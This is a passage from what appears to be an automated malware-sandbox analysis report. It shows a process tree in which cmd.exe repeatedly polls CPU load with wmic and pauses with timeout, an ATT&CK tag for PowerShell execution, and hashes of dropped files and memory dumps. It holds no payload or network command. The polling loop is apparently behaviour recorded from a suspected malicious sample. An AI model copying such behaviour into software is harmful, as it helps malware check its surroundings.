- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2rdzreq1.wrg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1304-0-0x00007FF9F65B3000-0x00007FF9F65B5000-memory.dmp

Filesize
8KB

Download
memory/1304-1-0x000001E8D5590000-0x000001E8D55B2000-memory.dmp

Filesize
136KB

Download
memory/1304-11-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download
memory/1304-12-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download
memory/1304-13-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download
memory/1304-14-0x00007FF9F65B3000-0x00007FF9F65B5000-memory.dmp

Filesize
8KB

Download
memory/1304-15-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download
memory/1304-16-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download
memory/1304-17-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download
memory/1304-20-0x00007FF9F65B0000-0x00007FF9F7071000-memory.dmp

Filesize
10.8MB

Download